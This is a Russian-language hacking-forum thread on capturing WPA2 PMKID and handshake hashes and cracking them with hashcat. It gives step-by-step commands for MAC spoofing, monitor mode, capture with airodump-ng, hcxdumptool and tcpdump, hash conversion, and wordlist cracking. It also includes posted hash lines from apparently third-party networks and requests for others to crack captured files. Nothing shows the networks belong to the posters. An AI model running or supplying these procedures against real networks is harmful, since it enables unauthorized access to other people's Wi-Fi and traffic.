Брут WPA2 без handshake используя PMKID + hashcat

Кто подскажет - ловил хэндшейк по обыкновению с помощью airodump-ng, точка была без клиентов - наконец появился, решил воспользоваться случаем - airodump-ng выдал сначала сообщение о пойманном pmkid, потом о пойманном хэндшейке (раньше только о хэндшейке сообщал - недавно обновлял арч, видимо новое), cap конвертировал через сайт hashcat в hc22000, ниже содержание файла. Т.е. понятно, обе записи для одного реального клиента (мак один и тот-же) - первая pmkid, вторая - pmkid+хэндшейк, смущает то, что поле pmkid отличается - разве для одного и того-же клиента оно не должно совпадать? Т.е. одна из записей вероятно не валидна?

WPA*01*ad311cb09a62909eababf5a2e04344f1*749d79ac137a*50b7c3d07526*52542d47504f4e2d31333741***
WPA*02*8d169d6c8ca1273778c20d6367cfa496*749d79ac137a*50b7c3d07526*52542d47504f4e2d31333741*aa43069a2bc750549cab7cf0a25dbcb33887b46717a152995f2b8a29309910d0*0103007502010a00000000000000000000d0759f59238553ad392c083f180e3fece37867f9c48d6be17c4b6da316da42c2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac023c00*a2

 

pmkid годен у двух записей.
Просто пароль там сложный и долго нужно перебирать.
Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.
Хотя тут и так ясно.

 

Я именно в этой теме спросил, т.к. хотел уточнить про разные pmkid у одного и того же клиента - про пароль в курсе, выложил недавно в платную тему, но за такое (31^8) вряд ли кто возьмётся. Просто там пост с пойманным отдельно pmkid в hcxdumptool (не было клиентов), хотелось удостоверится что он не левый получился (т.е. разные - это нормально). А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).

 

Code:

PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR

PROTOCOL = Fixed string "WPA"
TYPE = 01 for PMKID, 02 for EAPOL
PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
MACAP = MAC of AP
MACCLIENT = MAC of CLIENT
ESSID = network name (ESSID) in HEX
ANONCE = ANONCE
EAPOL = EAPOL (SNONCE is in here)
MESSAGEPAIR = Bitmask:

WPA*01*... - Вот этот только PMKID

 

Вот, спасибо оно ) - теперь ясно - варьируется PMKID/MIC, и не подумаешь.

Ещё хотел такой своеобразный вопрос задать - нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")? - просто эксперимент хочется провести с одним и тем-же клиентом - в хэлпе вроде как нет такого, т.е. по умолчанию каждый раз новый генерируется.

 

Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091
Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.
А проще и быстрее подключаться самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.

 

Ок, спасибо.

 

картинка в посте пропала.
Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?
это только при анализе дампа (в акуле, например) можно узнать?

 

Не пишет. Но, сколько я видел этих пакетов, pmkid всегда в конце. Поэтому, можно распечатать содержимое первого пакета (ключ -x), если там не нули в конце, это оно. Ну, или смотреть специализированным софтом.

 

развлекаюсь ваншотом (встроенная в телефон карта не всё может). он в лог сохраняет только имя, мак, пин и пас. если есть команда добавляющая данные, которые возвращает устройство "о себе" готов по возможности выгулять его)

что б два раза не вставать:
PMKID на android при помощи tcpdump
1. установить tcpdump (для termux)
pkg install tcpdump
2. запустить команду:
sudo tcpdump -nei wlan0 -s0 -xx -vv -w PMKID_$(date +"%Y-%m-%d-%H:%M:%S").cap
3. подключиться с любым паролем (например 11111111) к точке(ам), контролировать получение пакетов в терминале
4. прервать экзикуцию, обработать полученный файл

 

Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.
Например через VMware.

 

Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.
А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.
Для VMware скорее всего вам потребуется внешний WiFi адаптер!

 

В общем получил вот такое. Чем-то оно полезно?
WPA*02*2c9e9eaf659a11303ea4131a8e44ebbc*50ff2061a197*9c28f788a1b6*4b65656e657469632d33353434*b8f526056bc4b4b2767d2fc22f68727617926b1b590f833a56fdc0f20dd216da*0103007502010a00000000000000000005bbeaedade42c4b2178ece9437158c43a493d4c69e68f619f2d5d796f87694150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*00

Вот это 50ff2061a197 понятно mak, 4b65656e657469632d33353434 - это ssid. Дальше не знаю(

 

Code:

WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_CLIENT*MESSAGEPAIR

а PMKID

Code:

WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***

Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2

 

значит PMKID не получен. Я правильно понимаю?

 

Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...

 

Добрый день, друзья. Споймал PMKID, может кто - то переделать для кота. Спасибо

https://transfiles.ru/cl2g6

 

Скорее всего этот роутер не отдаёт PMKID. А скрипт не вешается. Просто не происходит в сети ни чего нового и ему нечего обновлять по информации на мониторе. Вот и кажется будто он висит.

 

Всем привет. Подскажите, пожалуйста, мой алгоритм действий правильный?
Прибиваем все лишнее и рандомизируем МАС
airmon-ng check kill
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 up

Переводим карточку в режим мониторинга
airmon-ng start wlan0

Собираем общую инфу о происходящем вокруг
airodump-ng wlan0mon --wps --manufacturer --uptime --ignore-negative-one --write last_dump

Далее либо получаем PMKID либо Аэродампом, но с одного роутра
airodump-ng --bssid CC:2D:E0:AA:BB:CC -c 6 --write AP_crack wlan0mon --wps --manufacturer --uptime
либо со всех доступных
hcxdumptool -i wlan0mon -o PMKID --enable_status=1

Далее конвертируем
hcxpcapngtool -o clean_PMKID.22000 --all PMKID

Скармливаем коту файл с собранной инфой.
hashcat -m 22000 --status -w 3 clean_PMKID.22000 top1Mpassword.txt


Собственно, 2 вопроса. Правильны ли мои действия? И все ли хеши в файле clean_PMKID.22000 проверяет hashcat?
Уже начал сомневаться в правильности действий, не могу набрутить пароли...

 

Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?